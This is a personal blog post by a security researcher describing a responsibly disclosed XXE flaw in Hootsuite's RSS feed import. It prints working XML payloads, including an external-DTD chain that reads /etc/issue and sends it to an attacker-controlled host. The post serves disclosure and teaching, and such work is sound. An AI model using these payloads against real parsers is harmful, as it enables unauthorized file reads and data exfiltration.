Yasin Soliman

Yasin Soliman


I'm Yasin, a security analyst and researcher from the UK. This is my personal blog for sharing technical findings. I also write for Graham Cluley and Tripwire.

Yasin Soliman
Author

Share


Twitter


From RSS to XXE: feed parsing on Hootsuite

Yasin SolimanYasin Soliman

Mike Knoop's research into XXE exploitation inspired me to experiment with RSS parsing on Hootsuite.

These vulnerabilities arise when a parser validates and processes XML-based input which contains references to an external entity.

Within fifteen minutes of testing, I had gained a pingback and demonstrated an exfiltration of /etc/issue.

Hootsuite logo

Hootsuite is the world's most widely used platform for managing social media. More than 15 million users, including 800+ of the Fortune 1000 companies, trust Hootsuite to manage their social media programs across multiple social networks from one integrated dashboard.

Getting a pingback in production

Using Mike's XML file as a model, I configured an "xxe" SYSTEM entity to deliver a pingback – a simple GET request towards the "attacker" Apache server.

<?xml version="1.0" encoding="UTF-8"?>  
<!DOCTYPE title [ <!ELEMENT title ANY >  
<!ENTITY xxe SYSTEM "http://<AttackIP>/rssXXE" >]>  
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">  
<channel>  
    <title>XXE Test Blog</title>
    <link>http://example.com/</link>
    <description>XXE Test Blog</description>
    <lastBuildDate>Mon, 02 Feb 2015 00:00:00 -0000</lastBuildDate>
    <item>
        <title>&xxe;</title>
        <link>http://example.com</link>
        <description>Test Post</description>
        <author>[email protected]</author>
        <pubDate>Mon, 02 Feb 2015 00:00:00 -0000</pubDate>
    </item>
</channel>  
</rss>  

After checking the Apache access log was ready (with a tail -f stream), I clicked "Save Feed" and waited in anticipation.

One second later, access.log lit up with a pingback – the Hootsuite server was vulnerable to SYSTEM entity exploitation.

Testing with /etc/issue

Transferring notes across my slew of TextEdit screens, I decided to craft a bipartite XML structure to demonstrate exploitability: grab the /etc/issue version file and exfiltrate via my Apache attack server.

<?xml version="1.0" encoding="UTF-8"?>  
<!DOCTYPE roottag [  
<!ENTITY % file SYSTEM "file:///etc/issue">  
<!ENTITY % dtd SYSTEM "http://<WebServer>/xxe.dtd">  
%dtd;]>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">  
<channel>  
    <title>&file; &dtd;</title>
    <link>http://example.com/</link>
    <description>&send;</description>
    <lastBuildDate>Mon, 02 Feb 2015 00:00:00 -0000</lastBuildDate>
    <item>
        <title>&file; &dtd;</title>
        <link>http://example.com</link>
        <description>&send;</description>
        <author>[email protected]</author>
        <pubDate>Mon, 02 Feb 2015 00:00:00 -0000</pubDate>
    </item>
</channel>  
</rss>  

As you can see, line 4 references a Document Type Definition file ("xxe.dtd") – used to deliver the contents of /etc/issue in a pingback:

<?xml version="1.0" encoding="UTF-8"?>  
<!ENTITY % all "<!ENTITY send SYSTEM 'http://<AttackIP>/XXE?%file;'>">  
%all;

Upon submitting the new XML file to the Dashboard as an RSS feed, Apache lit up with a second pingback: the contents of /etc/issue, exfiltrated straight across to the server.

XXE pingback on Hootsuite in production

Files with extended content or incompatible characters (e.g. & and \n) would cause the exfiltration to malfunction; the /etc/issue file is a safe test case used to identify XML External Entity concerns.

At this point, I decided to wrap things up and prepare a summary. Notes collated, I sent an email to [email protected].

Conclusion

This vulnerability was responsibly disclosed to Hootsuite; recognition has been provided on the Security page.

I would like to commend Pablo from Security Operations for handling this report with expedition and professionalism – and the Hootsuite development team for a swift remediation.

Further reading

Research timeline

The following timestamps are provided in GMT.

Public disclosure was requested several weeks after confirmation of the fix:

Yasin Soliman
Author

Yasin Soliman

Comments